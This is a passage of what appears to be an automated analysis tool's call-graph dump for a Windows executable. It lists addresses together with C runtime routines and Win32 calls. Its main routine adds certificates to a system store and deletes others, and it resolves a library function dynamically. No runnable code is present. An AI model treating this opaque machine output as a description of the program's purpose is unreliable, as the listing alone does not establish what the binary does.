5998->5997 5999->5986 6449 9c7a10 6452 9c7a27 6449->6452 6453 9c7a49 6452->6453 6454 9c7a35 6452->6454 6456 9c7a51 6453->6456 6457 9c7a63 6453->6457 6455 9c47f9 __dosmaperr 15 API calls 6454->6455 6458 9c7a3a 6455->6458 6459 9c47f9 __dosmaperr 15 API calls 6456->6459 6460 9c3f72 __fassign 33 API calls 6457->6460 6464 9c7a22 6457->6464 6461 9c473d _abort 21 API calls 6458->6461 6462 9c7a56 6459->6462 6460->6464 6461->6464 6463 9c473d _abort 21 API calls 6462->6463 6463->6464 6593 9c7351 6594 9c735e 6593->6594 6595 9c480c _abort 15 API calls 6594->6595 6596 9c7378 6595->6596 6597 9c4869 _free 15 API calls 6596->6597 6598 9c7384 6597->6598 6599 9c480c _abort 15 API calls 6598->6599 6603 9c73aa 6598->6603 6600 9c739e 6599->6600 6602 9c4869 _free 15 API calls 6600->6602 6601 9c59b3 6 API calls 6601->6603 6602->6603 6603->6601 6604 9c73b6 6603->6604 5748 9c6893 GetProcessHeap 6605 9c2f53 6606 9c2f7e 6605->6606 6607 9c2f62 6605->6607 6609 9c522b 46 API calls 6606->6609 6607->6606 6608 9c2f68 6607->6608 6610 9c47f9 __dosmaperr 15 API calls 6608->6610 6611 9c2f85 GetModuleFileNameA 6609->6611 6612 9c2f6d 6610->6612 6613 9c2fa9 6611->6613 6614 9c473d _abort 21 API calls 6612->6614 6628 9c3077 6613->6628 6616 9c2f77 6614->6616 6618 9c31ec 15 API calls 6619 9c2fd3 6618->6619 6620 9c2fdc 6619->6620 6621 9c2fe8 6619->6621 6622 9c47f9 __dosmaperr 15 API calls 6620->6622 6623 9c3077 33 API calls 6621->6623 6627 9c2fe1 6622->6627 6625 9c2ffe 6623->6625 6624 9c4869 _free 15 API calls 6624->6616 6626 9c4869 _free 15 API calls 6625->6626 6625->6627 6626->6627 6627->6624 6630 9c309c 6628->6630 6629 9c55b6 33 API calls 6629->6630 6630->6629 6632 9c30fc 6630->6632 6631 9c2fc6 6631->6618 6632->6631 6633 9c55b6 33 API calls 6632->6633 6633->6632 5032 9c130d 5033 9c1319 ___scrt_is_nonwritable_in_current_image 5032->5033 5060 9c162b 5033->5060 5035 9c1320 5036 9c1473 5035->5036 5044 9c134a ___scrt_is_nonwritable_in_current_image _abort ___scrt_release_startup_lock 5035->5044 5112 9c191f IsProcessorFeaturePresent 5036->5112 5038 9c147a 5039 9c1480 5038->5039 5116 9c37e1 5038->5116 5119 9c3793 5039->5119 5043 9c1369 5044->5043 5045 9c13ea 5044->5045 5097 9c37a9 5044->5097 5068 9c1a34 5045->5068 5052 9c1405 5103 9c1a6a GetModuleHandleW 5052->5103 5055 9c1410 5056 9c1419 5055->5056 5105 9c3784 5055->5105 5108 9c179c 5056->5108 5061 9c1634 5060->5061 5122 9c1bd4 IsProcessorFeaturePresent 5061->5122 5065 9c1645 5066 9c1649 5065->5066 5132 9c1f7d 5065->5132 5066->5035 5192 9c20b0 5068->5192 5071 9c13f0 5072 9c3457 5071->5072 5194 9c522b 5072->5194 5074 9c3460 5076 9c13f8 5074->5076 5198 9c55b6 5074->5198 5077 9c1000 6 API calls 5076->5077 5078 9c1096 CryptMsgGetParam 5077->5078 5079 9c11e3 Sleep 5077->5079 5080 9c10bc LocalAlloc 5078->5080 5081 9c1162 CryptMsgGetParam 5078->5081 5082 9c1215 CertCloseStore LocalFree LocalFree LocalFree 5079->5082 5086 9c11f7 5079->5086 5084 9c1156 LocalFree 5080->5084 5085 9c10d7 5080->5085 5081->5079 5083 9c1174 CryptMsgGetParam 5081->5083 5082->5052 5083->5079 5087 9c1188 CertFindAttribute CertFindAttribute 5083->5087 5084->5081 5088 9c10e0 LocalAlloc CryptMsgGetParam 5085->5088 5086->5082 5089 9c120a CertDeleteCertificateFromStore 5086->5089 5092 9c11b5 LoadLibraryA GetProcAddress 5087->5092 5093 9c11b1 5087->5093 5090 9c113d LocalFree 5088->5090 5091 9c1114 CertCreateCertificateContext 5088->5091 5089->5086 5090->5088 5096 9c114d 5090->5096 5094 9c1126 CertAddCertificateContextToStore 5091->5094 5095 9c1133 CertFreeCertificateContext 5091->5095 5092->5079 5093->5079 5093->5092 5094->5095 5095->5090 5096->5084 5098 9c37d1 _abort 5097->5098 5098->5045 5099 9c4424 _abort 33 API calls 5098->5099 5102 9c3e9a 5099->5102 5100 9c3f24 _abort 33 API calls 5101 9c3ec4 5100->5101 5102->5100 5104 9c140c 5103->5104 5104->5038 5104->5055 5686 9c355e 5105->5686 5107 9c378f 5107->5056 5110 9c17a8 ___scrt_uninitialize_crt 5108->5110 5109 9c1421 5109->5043 5110->5109 5111 9c1f7d ___scrt_uninitialize_crt 7 API calls 5110->5111 5111->5109 5113 9c1935 _abort 5112->5113 5114 9c19e0 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 5113->5114 5115 9c1a24 _abort 5114->5115 5115->5038 5117 9c355e _abort 23 API calls 5116->5117 5118 9c37f2 5117->5118 5118->5039 5120 9c355e _abort 23 API calls 5119->5120 5121 9c1488 5120->5121 5123 9c1640 5122->5123 5124 9c1f5e 5123->5124 5138 9c24b1 5124->5138 5127 9c1f67 5127->5065 5129 9c1f6f 5130 9c1f7a 5129->5130 5152 9c24ed 5129->5152 5130->5065 5133 9c1f86 5132->5133 5134 9c1f90 5132->5134 5135 9c2496 ___vcrt_uninitialize_ptd 6 API calls 5133->5135 5134->5066 5136 9c1f8b 5135->5136 5137 9c24ed ___vcrt_uninitialize_locks DeleteCriticalSection 5136->5137 5137->5134 5139 9c24ba 5138->5139 5141 9c24e3 5139->5141 5142 9c1f63 5139->5142 5156 9c271d 5139->5156 5143 9c24ed ___vcrt_uninitialize_locks DeleteCriticalSection 5141->5143 5142->5127 5144 9c2463 5142->5144 5143->5142 5173 9c262e 5144->5173 5147 9c2478 5147->5129 5150 9c2493 5150->5129 5153 9c2517 5152->5153 5154 9c24f8 5152->5154 5153->5127 5155 9c2502 DeleteCriticalSection 5154->5155 5155->5153 5155->5155 5161 9c2543 5156->5161 5159 9c2755 InitializeCriticalSectionAndSpinCount 5160 9c2740 5159->5160 5160->5139 5162 9c2564 5161->5162 5163 9c2560 5161->5163 5162->5163 5164 9c25cc GetProcAddress 5162->5164 5166 9c25bd 5162->5166 5168 9c25e3 LoadLibraryExW 5162->5168 5163->5159 5163->5160 5164->5163 5166->5164 5167 9c25c5 FreeLibrary 5166->5167 5167->5164 5169 9c25fa GetLastError 5168->5169 5170 9c262a 5168->5170 5169->5170 5171 9c2605 ___vcrt_InitializeCriticalSectionEx 5169->5171 5170->5162 5171->5170 5172 9c261b LoadLibraryExW 5171->5172 5172->5162 5174 9c2543 ___vcrt_InitializeCriticalSectionEx 5 API calls 5173->5174 5175 9c2648 5174->5175 5176 9c2661 TlsAlloc 5175->5176 5177 9c246d 5175->5177 5177->5147 5178 9c26df 5177->5178 5179 9c2543 ___vcrt_InitializeCriticalSectionEx 5 API calls 5178->5179 5180 9c26f9 5179->5180 5181 9c2714 TlsSetValue 5180->5181 5182 9c2486 5180->5182 5181->5182 5182->5150 5183 9c2496 5182->5183 5184 9c24a6 5183->5184 5185 9c24a0 5183->5185 5184->5147 5187 9c2669 5185->5187 5188 9c2543 ___vcrt_InitializeCriticalSectionEx 5 API calls 5187->5188 5189 9c2683 5188->5189 5190 9c269b TlsFree 5189->5190 5191 9c268f 5189->5191 5190->5191 5191->5184 5193 9c1a47 GetStartupInfoW 5192->5193 5193->5071 5195 9c5234 5194->5195 5196 9c523d 5194->5196 5201 9c512a 5195->5201 5196->5074 5683 9c555d 5198->5683 5221 9c4424 GetLastError 5201->5221 5203 9c5137 5241 9c5249 5203->5241 5205 9c513f 5250 9c4ebe 5205->5250 5208 9c5156 5208->5196 5211 9c5199 5275 9c4869 5211->5275 5214 9c518c 5215 9c5194 5214->5215 5218 9c51b1 5214->5218 5272 9c47f9 5215->5272 5217 9c51dd 5217->5211 5281 9c4d94 5217->5281 5218->5217 5219 9c4869 _free 15 API calls 5218->5219 5219->5217 5222 9c443a 5221->5222 5223 9c4440 5221->5223 5284 9c5904 5222->5284 5228 9c448f SetLastError 5223->5228 5289 9c480c 5223->5289 5227 9c445a 5230 9c4869 _free 15 API calls 5227->5230 5228->5203 5232 9c4460 5230->5232 5231 9c446f 5231->5227 5233 9c4476 5231->5233 5234 9c449b SetLastError 5232->5234 5301 9c4296 5233->5301 5306 9c3f24 5234->5306 5239 9c4869 _free 15 API calls 5240 9c4488 5239->5240 5240->5228 5240->5234 5242 9c5255 ___scrt_is_nonwritable_in_current_image 5241->5242 5243 9c4424 _abort 33 API calls 5242->5243 5244 9c525f 5243->5244 5247 9c3f24 _abort 33 API calls 5244->5247 5248 9c52e3 _abort 5244->5248 5249 9c4869 _free 15 API calls 5244->5249 5542 9c56e2 EnterCriticalSection 5244->5542 5543 9c52da 5244->5543 5247->5244 5248->5205 5249->5244 5547 9c3f72 5250->5547 5253 9c4edf GetOEMCP 5256 9c4f08 5253->5256 5254 9c4ef1 5255 9c4ef6 GetACP 5254->5255 5254->5256 5255->5256 5256->5208 5257 9c62ff 5256->5257 5258 9c633d 5257->5258 5263 9c630d _abort 5257->5263 5260 9c47f9 __dosmaperr 15 API calls 5258->5260 5259 9c6328 HeapAlloc 5261 9c5167 5259->5261 5259->5263 5260->5261 5261->5211 5264 9c52eb 5261->5264 5262 9c6992 _abort 2 API calls 5262->5263 5263->5258 5263->5259 5263->5262 5265 9c4ebe 35 API calls 5264->5265 5266 9c530a 5265->5266 5267 9c535b IsValidCodePage 5266->5267 5269 9c5311 _ValidateLocalCookies 5266->5269 5271 9c5380 _abort 5266->5271 5268 9c536d GetCPInfo 5267->5268 5267->5269 5268->5269 5268->5271 5269->5214 5584 9c4f96 GetCPInfo 5271->5584 5273 9c44a8 __dosmaperr 15 API calls 5272->5273 5274 9c47fe 5273->5274 5274->5211 5276 9c4874 HeapFree 5275->5276 5277 9c489d __dosmaperr 5275->5277 5276->5277 5278 9c4889 5276->5278 5277->5208 5279 9c47f9 __dosmaperr 13 API calls 5278->5279 5280 9c488f GetLastError 5279->5280 5280->5277 5647 9c4d51 5281->5647 5283 9c4db8 5283->5211 5317 9c5741 5284->5317 5286 9c592b 5287 9c5943 TlsGetValue 5286->5287 5288 9c5937 _ValidateLocalCookies 5286->5288 5287->5288 5288->5223 5290 9c4819 _abort 5289->5290 5291 9c4859 5290->5291 5292 9c4844 HeapAlloc 5290->5292 5330 9c6992 5290->5330 5294 9c47f9 __dosmaperr 14 API calls 5291->5294 5292->5290 5293 9c4452 5292->5293 5293->5227 5296 9c595a 5293->5296 5294->5293 5297 9c5741 _abort 5 API calls 5296->5297 5298 9c5981 5297->5298 5299 9c599c TlsSetValue 5298->5299 5300 9c5990 _ValidateLocalCookies 5298->5300 5299->5300 5300->5231 5344 9c426e 5301->5344 5452 9c6b14 5306->5452 5309 9c3f35 5311 9c3f3e IsProcessorFeaturePresent 5309->5311 5312 9c3f5c 5309->5312 5314 9c3f49 5311->5314 5313 9c3793 _abort 23 API calls 5312->5313 5316 9c3f66 5313->5316 5480 9c4573 5314->5480 5318 9c576d 5317->5318 5319 9c5771 _abort 5317->5319 5318->5319 5321 9c5791 5318->5321 5323 9c57dd 5318->5323 5319->5286 5321->5319 5322 9c579d GetProcAddress 5321->5322 5322->5319 5324 9c57fe LoadLibraryExW 5323->5324 5325 9c57f3 5323->5325 5326 9c581b GetLastError 5324->5326 5327 9c5833 5324->5327 5325->5318 5326->5327 5328 9c5826 LoadLibraryExW 5326->5328 5327->5325 5329 9c584a FreeLibrary 5327->5329 5328->5327 5329->5325 5333 9c69d6 5330->5333 5332 9c69a8 _ValidateLocalCookies 5332->5290 5334 9c69e2 ___scrt_is_nonwritable_in_current_image 5333->5334 5339 9c56e2 EnterCriticalSection 5334->5339 5336 9c69ed 5340 9c6a1f 5336->5340 5338 9c6a14 _abort 5338->5332 5339->5336 5343 9c572a LeaveCriticalSection 5340->5343 5342 9c6a26 5342->5338 5343->5342 5350 9c41ae 5344->5350 5346 9c4292 5347 9c421e 5346->5347 5361 9c40b2 5347->5361 5349 9c4242 5349->5239 5351 9c41ba ___scrt_is_nonwritable_in_current_image 5350->5351 5356 9c56e2 EnterCriticalSection 5351->5356 5353 9c41c4 5357 9c41ea 5353->5357 5355 9c41e2 _abort 5355->5346 5356->5353 5360 9c572a LeaveCriticalSection 5357->5360 5359 9c41f4 5359->5355 5360->5359 5362 9c40be ___scrt_is_nonwritable_in_current_image 5361->5362 5369 9c56e2 EnterCriticalSection 5362->5369 5364 9c40c8 5370 9c43d9 5364->5370 5366 9c40e0 5374 9c40f6 5366->5374 5368 9c40ee _abort 5368->5349 5369->5364 5371 9c43e8 __fassign 5370->5371 5373 9c440f __fassign 5370->5373 5371->5373 5377 9c6507 5371->5377 5373->5366 5451 9c572a LeaveCriticalSection 5374->5451 5376 9c4100 5376->5368 5379 9c6587 5377->5379 5380 9c651d 5377->5380 5381 9c4869 _free 15 API calls 5379->5381 5403 9c65d5 5379->5403 5380->5379 5385 9c4869 _free 15 API calls 5380->5385 5387 9c6550 5380->5387 5382 9c65a9 5381->5382 5383 9c4869 _free 15 API calls 5382->5383 5388 9c65bc 5383->5388 5384 9c4869 _free 15 API calls 5389 9c657c 5384->5389 5391 9c6545 5385->5391 5386 9c65e3 5390 9c6643 5386->5390 5404 9c4869 15 API calls _free 5386->5404 5392 9c4869 _free 15 API calls 5387->5392 5402 9c6572 5387->5402 5393 9c4869 _free 15 API calls 5388->5393 5394 9c4869 _free 15 API calls 5389->5394 5395 9c4869 _free 15 API calls 5390->5395 5405 9c6078 5391->5405 5397 9c6567 5392->5397 5398 9c65ca 5393->5398 5394->5379 5399 9c6649 5395->5399 5433 9c6176 5397->5433 5401 9c4869 _free 15 API calls 5398->5401 5399->5373 5401->5403 5402->5384 5445 9c667a 5403->5445 5404->5386 5407 9c6089 5405->5407 5432 9c6172 5405->5432 5406 9c609a 5409 9c60ac 5406->5409 5410 9c4869 _free 15 API calls 5406->5410 5407->5406 5408 9c4869 _free 15 API calls 5407->5408 5408->5406 5411 9c60be 5409->5411 5413 9c4869 _free 15 API calls 5409->5413 5410->5409 5412 9c60d0 5411->5412 5414 9c4869 _free 15 API calls 5411->5414 5415 9c60e2 5412->5415 5416 9c4869 _free 15 API calls 5412->5416 5413->5411 5414->5412 5417 9c60f4 5415->5417 5418 9c4869 _free 15 API calls 5415->5418 5416->5415 5419 9c6106 5417->5419 5421 9c4869 _free 15 API calls 5417->5421 5418->5417 5420 9c6118 5419->5420 5422 9c4869 _free 15 API calls 5419->5422 5423 9c612a 5420->5423 5424 9c4869 _free 15 API calls 5420->5424 5421->5419 5422->5420 5425 9c613c 5423->5425 5426 9c4869 _free 15 API calls 5423->5426 5424->5423 5427 9c614e 5425->5427 5429 9c4869 _free 15 API calls 5425->5429 5426->5425 5428 9c6160 5427->5428 5430 9c4869 _free 15 API calls 5427->5430 5431 9c4869 _free 15 API calls 5428->5431 5428->5432 5429->5427 5430->5428 5431->5432 5432->5387 5434 9c6183 5433->5434 5444 9c61db 5433->5444 5435 9c6193 5434->5435 5437 9c4869 _free 15 API calls 5434->5437 5436 9c61a5 5435->5436 5438 9c4869 _free 15 API calls 5435->5438 5439 9c61b7 5436->5439 5440 9c4869 _free 15 API calls 5436->5440 5437->5435 5438->5436 5441 9c4869 _free 15 API calls 5439->5441 5442 9c61c9 5439->5442 5440->5439 5441->5442 5443 9c4869 _free 15 API calls 5442->5443 5442->5444 5443->5444 5444->5402 5446 9c6687 5445->5446 5450 9c66a5 5445->5450 5447 9c621b __fassign 15 API calls 5446->5447 5446->5450 5448 9c669f 5447->5448 5449 9c4869 _free 15 API calls 5448->5449 5449->5450 5450->5386 5451->5376 5484 9c6a82 5452->5484 5455 9c6b6f 5456 9c6b7b _abort 5455->5456 5460 9c6ba8 _abort 5456->5460 5462 9c6ba2 _abort 5456->5462 5498 9c44a8 GetLastError 5456->5498 5458 9c6bf4 5459 9c47f9 __dosmaperr 15 API calls 5458->5459 5461 9c6bf9 5459->5461 5466 9c6c20 5460->5466 5520 9c56e2 EnterCriticalSection 5460->5520 5517 9c473d 5461->5517 5462->5458 5462->5460 5465 9c6bd7 _abort 5462->5465 5465->5309 5467 9c6c7f 5466->5467 5469 9c6c77 5466->5469 5478 9c6caa 5466->5478 5521 9c572a LeaveCriticalSection 5466->5521 5467->5478 5522 9c6b66 5467->5522 5472 9c3793 _abort 23 API calls 5469->5472 5472->5467 5474 9c4424 _abort 33 API calls 5476 9c6d0d 5474->5476 5476->5465 5479 9c4424 _abort 33 API calls 5476->5479 5477 9c6b66 _abort 33 API calls 5477->5478 5525 9c6d2f 5478->5525 5479->5465 5481 9c458f _abort 5480->5481 5482 9c45bb IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 5481->5482 5483 9c468c _abort _ValidateLocalCookies 5482->5483 5483->5312 5487 9c6a28 5484->5487 5486 9c3f29 5486->5309 5486->5455 5488 9c6a34 ___scrt_is_nonwritable_in_current_image 5487->5488 5493 9c56e2 EnterCriticalSection 5488->5493 5490 9c6a42 5494 9c6a76 5490->5494 5492 9c6a69 _abort 5492->5486 5493->5490 5497 9c572a LeaveCriticalSection 5494->5497 5496 9c6a80 5496->5492 5497->5496 5499 9c44c7 5498->5499 5500 9c44c1 5498->5500 5502 9c480c _abort 12 API calls 5499->5502 5504 9c451e SetLastError 5499->5504 5501 9c5904 _abort 6 API calls 5500->5501 5501->5499 5503 9c44d9 5502->5503 5505 9c44e1 5503->5505 5507 9c595a _abort 6 API calls 5503->5507 5506 9c4527 5504->5506 5508 9c4869 _free 12 API calls 5505->5508 5506->5462 5509 9c44f6 5507->5509 5511 9c44e7 5508->5511 5509->5505 5510 9c44fd 5509->5510 5512 9c4296 _abort 12 API calls 5510->5512 5513 9c4515 SetLastError 5511->5513 5514 9c4508 5512->5514 5513->5506 5515 9c4869 _free 12 API calls 5514->5515 5516 9c450e 5515->5516 5516->5504 5516->5513 5529 9c46c2 5517->5529 5519 9c4749 5519->5465 5520->5466 5521->5469 5523 9c4424 _abort 33 API calls 5522->5523 5524 9c6b6b 5523->5524 5524->5477 5526 9c6cfe 5525->5526 5527 9c6d35 5525->5527 5526->5465 5526->5474 5526->5476 5541 9c572a LeaveCriticalSection 5527->5541 5530 9c44a8 __dosmaperr 15 API calls 5529->5530 5531 9c46d8 5530->5531 5536 9c46e6 _ValidateLocalCookies 5531->5536 5537 9c474d IsProcessorFeaturePresent 5531->5537 5533 9c473c 5534 9c46c2 _abort 21 API calls 5533->5534 5535 9c4749 5534->5535 5535->5519 5536->5519 5538 9c4758 5537->5538 5539 9c4573 _abort 3 API calls 5538->5539 5540 9c476d GetCurrentProcess TerminateProcess 5539->5540 5540->5533 5541->5526 5542->5244 5546 9c572a LeaveCriticalSection 5543->5546 5545 9c52e1 5545->5244 5546->5545 5548 9c3f8f 5547->5548 5549 9c3f85 5547->5549 5548->5549 5550 9c4424 _abort 33 API calls 5548->5550 5549->5253 5549->5254 5551 9c3fb0 5550->5551 5555 9c72d1 5551->5555 5556 9c3fc9 5555->5556 5557 9c72e4 5555->5557 5559 9c72fe 5556->5559 5557->5556 5563 9c6754 5557->5563 5560 9c7326 5559->5560 5561 9c7311 5559->5561 5560->5549 5561->5560 5562 9c5249 __fassign 33 API calls 5561->5562 5562->5560 5564 9c6760 ___scrt_is_nonwritable_in_current_image 5563->5564 5565 9c4424 _abort 33 API calls 5564->5565 5566 9c6769 5565->5566 5567 9c67b7 _abort 5566->5567 5575 9c56e2 EnterCriticalSection 5566->5575 5567->5556 5569 9c6787 5576 9c67cb 5569->5576 5574 9c3f24 _abort 33 API calls 5574->5567 5575->5569 5577 9c679b 5576->5577 5578 9c67d9 __fassign 5576->5578 5580 9c67ba 5577->5580 5578->5577 5579 9c6507 __fassign 15 API calls 5578->5579 5579->5577 5583 9c572a LeaveCriticalSection 5580->5583 5582 9c67ae 5582->5567 5582->5574 5583->5582 5585 9c4fd0 5584->5585 5591 9c507a _ValidateLocalCookies 5584->5591 5592 9c634d 5585->5592 5587 9c5031 5604 9c7cd1 5587->5604 5590 9c7cd1 38 API calls 5590->5591 5591->5269 5593 9c3f72 __fassign 33 API calls 5592->5593 5594 9c636d MultiByteToWideChar 5593->5594 5597 9c63ab 5594->5597 5600 9c6443 _ValidateLocalCookies 5594->5600 5596 9c63cc _abort __alloca_probe_16 5598 9c643d 5596->5598 5602 9c6411 MultiByteToWideChar 5596->5602 5597->5596 5599 9c62ff 16 API calls 5597->5599 5609 9c646a 5598->5609 5599->5596 5600->5587 5602->5598 5603 9c642d GetStringTypeW 5602->5603 5603->5598 5605 9c3f72 __fassign 33 API calls 5604->5605 5606 9c7ce4 5605->5606 5613 9c7ab4 5606->5613 5608 9c5052 5608->5590 5610 9c6487 5609->5610 5611 9c6476 5609->5611 5610->5600 5611->5610 5612 9c4869 _free 15 API calls 5611->5612 5612->5610 5614 9c7acf 5613->5614 5615 9c7af5 MultiByteToWideChar 5614->5615 5616 9c7ca9 _ValidateLocalCookies 5615->5616 5617 9c7b1f 5615->5617 5616->5608 5618 9c62ff 16 API calls 5617->5618 5621 9c7b40 __alloca_probe_16 5617->5621 5618->5621 5619 9c7b89 MultiByteToWideChar 5620 9c7bf5 5619->5620 5622 9c7ba2 5619->5622 5623 9c646a __freea 15 API calls 5620->5623 5621->5619 5621->5620 5638 9c5a15 5622->5638 5623->5616 5625 9c7bb9 5625->5620 5626 9c7bcc 5625->5626 5627 9c7c04 5625->5627 5626->5620 5628 9c5a15 6 API calls 5626->5628 5630 9c62ff 16 API calls 5627->5630 5631 9c7c25 __alloca_probe_16 5627->5631 5628->5620 5629 9c7c9a 5633 9c646a __freea 15 API calls 5629->5633 5630->5631 5631->5629 5632 9c5a15 6 API calls 5631->5632 5634 9c7c79 5632->5634 5633->5620 5634->5629 5635 9c7c88 WideCharToMultiByte 5634->5635 5635->5629 5636 9c7cc8 5635->5636 5637 9c646a __freea 15 API calls 5636->5637 5637->5620 5639 9c5741 _abort 5 API calls 5638->5639 5640 9c5a3c 5639->5640 5641 9c5a45 _ValidateLocalCookies 5640->5641 5644 9c5a9d 5640->5644 5641->5625 5643 9c5a85 LCMapStringW 5643->5641 5645 9c5741 _abort 5 API calls 5644->5645 5646 9c5ac4 _ValidateLocalCookies 5645->5646 5646->5643 5648 9c4d5d ___scrt_is_nonwritable_in_current_image 5647->5648 5655 9c56e2 EnterCriticalSection 5648->5655 5650 9c4d67 5656 9c4dbc 5650->5656 5654 9c4d80 _abort 5654->5283 5655->5650 5668 9c54dc 5656->5668 5658 9c4e0a 5659 9c54dc 21 API calls 5658->5659 5660 9c4e26 5659->5660 5661 9c54dc 21 API calls 5660->5661 5662 9c4e44 5661->5662 5663 9c4d74 5662->5663 5664 9c4869 _free 15 API calls 5662->5664 5665 9c4d88 5663->5665 5664->5663 5682 9c572a LeaveCriticalSection 5665->5682 5667 9c4d92 5667->5654 5669 9c54ed 5668->5669 5673 9c54e9 5668->5673 5670 9c54f4 5669->5670 5675 9c5507 _abort 5669->5675 5671 9c47f9 __dosmaperr 15 API calls 5670->5671 5672 9c54f9 5671->5672 5674 9c473d _abort 21 API calls 5672->5674 5673->5658 5674->5673 5675->5673 5676 9c5535 5675->5676 5677 9c553e 5675->5677 5678 9c47f9 __dosmaperr 15 API calls 5676->5678 5677->5673 5680 9c47f9 __dosmaperr 15 API calls 5677->5680 5679 9c553a 5678->5679 5681 9c473d _abort 21 API calls 5679->5681 5680->5679 5681->5673 5682->5667 5684 9c3f72 __fassign 33 API calls 5683->5684 5685 9c5571 5684->5685 5685->5074 5687 9c356a _abort 5686->5687 5694 9c3582 5687->5694 5701 9c36b8 GetModuleHandleW 5687->5701 5690 9c358a 5699 9c35ff _abort 5690->5699 5709 9c3c97 5690->5709 5708 9c56e2 EnterCriticalSection 5694->5708 5696 9c3671 _abort 5696->5107 5712 9c3668 5699->5712 5702 9c3576 5701->5702 5702->5694 5703 9c36fc GetModuleHandleExW 5702->5703 5704 9c3726 GetProcAddress 5703->5704 5706 9c373b 5703->5706 5704->5706 5705 9c374f FreeLibrary 5707 9c3758 _ValidateLocalCookies 5705->5707 5706->5705 5706->5707 5707->5694 5708->5690 5723 9c39d0 5709->5723 5743 9c572a LeaveCriticalSection 5712->5743 5714 9c3641 5714->5696 5715 9c3677 5714->5715 5744 9c5b1f 5715->5744 5717 9c3681 5718 9c36a5 5717->5718 5719 9c3685 GetPEB 5717->5719 5721 9c36fc _abort 3 API calls 5718->5721 5719->5718 5720 9c3695 GetCurrentProcess TerminateProcess 5719->5720 5720->5718 5722 9c36ad ExitProcess 5721->5722 5726 9c397f 5723->5726 5725 9c39f4 5725->5699 5727 9c398b ___scrt_is_nonwritable_in_current_image 5726->5727 5734 9c56e2 EnterCriticalSection 5727->5734 5729 9c3999 5735 9c3a20 5729->5735 5731 9c39a6 5739 9c39c4 5731->5739 5733 9c39b7 _abort 5733->5725 5734->5729 5736 9c3a40 _ValidateLocalCookies 5735->5736 5737 9c3a48 5735->5737 5736->5731 5737->5736 5738 9c4869 _free 15 API calls 5737->5738 5738->5736 5742 9c572a LeaveCriticalSection 5739->5742 5741 9c39ce 5741->5733 5742->5741 5743->5714 5745 9c5b44 5744->5745 5747 9c5b3a _ValidateLocalCookies 5744->5747 5746 9c5741 _abort 5 API calls 5745->5746 5746->5747 5747->5717 6634 9c324d 6635 9c522b 46 API calls 6634->6635 6636 9c325f 6635->6636 6645 9c561e GetEnvironmentStringsW 6636->6645 6639 9c326a 6641 9c4869 _free 15 API calls 6639->6641 6642 9c329f 6641->6642 6643 9c4869 _free 15 API calls 6643->6639 6644 9c3275 6644->6643 6646 9c5635 6645->6646 6656 9c5688 6645->6656 6647 9c563b WideCharToMultiByte 6646->6647 6650 9c5657 6647->6650 6647->6656 6648 9c3264 6648->6639 6657 9c32a5 6648->6657 6649 9c5691 FreeEnvironmentStringsW 6649->6648 6651 9c62ff 16 API calls 6650->6651 6652 9c565d 6651->6652 6653 9c5664 WideCharToMultiByte 6652->6653 6654 9c567a 6652->6654 6653->6654 6655 9c4869 _free 15 API calls 6654->6655 6655->6656 6656->6648 6656->6649 6658 9c32ba 6657->6658 6659 9c480c _abort 15 API calls 6658->6659 6664 9c32e1 6659->6664 6660 9c4869 _free 15 API calls 6662 9c335f 6660->6662 6661 9c3345 6661->6660 6662->6644 6663 9c480c _abort 15 API calls 6663->6664 6664->6661 6664->6663 6665 9c3347 6664->6665 6669 9c3369 6664->6669 6672 9c4869 _free 15 API calls 6664->6672 6674 9c3eca 6664->6674 6667 9c3376 15 API calls 6665->6667 6668 9c334d 6667->6668 6670 9c4869 _free 15 API calls 6668->6670 6671 9c474d _abort 6 API calls 6669->6671 6670->6661 6673 9c3375 6671->6673 6672->6664 6675 9c3ee5 6674->6675 6676 9c3ed7 6674->6676 6677 9c47f9 __dosmaperr 15 API calls 6675->6677 6676->6675 6681 9c3efc 6676->6681 6678 9c3eed 6677->6678 6679 9c473d _abort 21 API calls 6678->6679 6680 9c3ef7 6679->6680 6680->6664 6681->6680 6682 9c47f9 __dosmaperr 15 API calls 6681->6682 6682->6678 6000 9c55ce GetCommandLineA GetCommandLineW 5749 9c3d8f 5750 9c3d9e 5749->5750 5754 9c3db2 5749->5754 5752 9c4869 _free 15 API calls 5750->5752 5750->5754 5751 9c4869 _free 15 API calls 5753 9c3dc4 5751->5753 5752->5754 5755 9c4869 _free 15 API calls 5753->5755 5754->5751 5756 9c3dd7 5755->5756 5757 9c4869 _free 15 API calls 5756->5757 5758 9c3de8 5757->5758 5759 9c4869 _free 15 API calls 5758->5759 5760 9c3df9 5759->5760 6465 9c430f 6466 9c432a 6465->6466 6467 9c431a 6465->6467 6471 9c4330 6467->6471 6470 9c4869 _free 15 API calls 6470->6466 6472 9c4349 6471->6472 6473 9c4343 6471->6473 6475 9c4869 _free 15 API calls 6472->6475 6474 9c4869 _free 15 API calls 6473->6474 6474->6472 6476 9c4355 6475->6476 6477 9c4869 _free 15 API calls 6476->6477 6478 9c4360 6477->6478 6479 9c4869 _free 15 API calls 6478->6479 6480 9c436b 6479->6480 6481 9c4869 _free 15 API calls 6480->6481 6482 9c4376 6481->6482 6483 9c4869 _free 15 API calls 6482->6483 6484 9c4381 6483->6484 6485 9c4869 _free 15 API calls 6484->6485 6486 9c438c 6485->6486 6487 9c4869 _free 15 API calls 6486->6487 6488 9c4397 6487->6488 6489 9c4869 _free 15 API calls 6488->6489 6490 9c43a2 6489->6490 6491 9c4869 _free 15 API calls 6490->6491 6492 9c43b0 6491->6492 6497 9c41f6 6492->6497 6503 9c4102 6497->6503 6499 9c421a 6500 9c4246 6499->6500 6516 9c4163 6500->6516 6502 9c426a 6502->6470 6504 9c410e ___scrt_is_nonwritable_in_current_image 6503->6504 6511 9c56e2 EnterCriticalSection 6504->6511 6506 9c4142 6512 9c4157 6506->6512 6508 9c4118 6508->6506 6510 9c4869 _free 15 API calls 6508->6510 6509 9c414f _abort 6509->6499 6510->6506 6511->6508 6515 9c572a LeaveCriticalSection 6512->6515 6514 9c4161 6514->6509 6515->6514 6517 9c416f ___scrt_is_nonwritable_in_current_image 6516->6517 6524 9c56e2 EnterCriticalSection 6517->6524 6519 9c4179 6520 9c43d9 _abort 15 API calls 6519->6520 6521 9c418c 6520->6521 6525 9c41a2 6521->6525 6523 9c419a _abort 6523->6502 6524->6519 6528 9c572a LeaveCriticalSection 6525->6528 6527 9c41ac 6527->6523 6528->6527 6683 9c1248 6684 9c1250 6683->6684 6700 9c37f7 6684->6700 6686 9c125b 6707 9c1664 6686->6707 6688 9c12cd 6689 9c191f 4 API calls 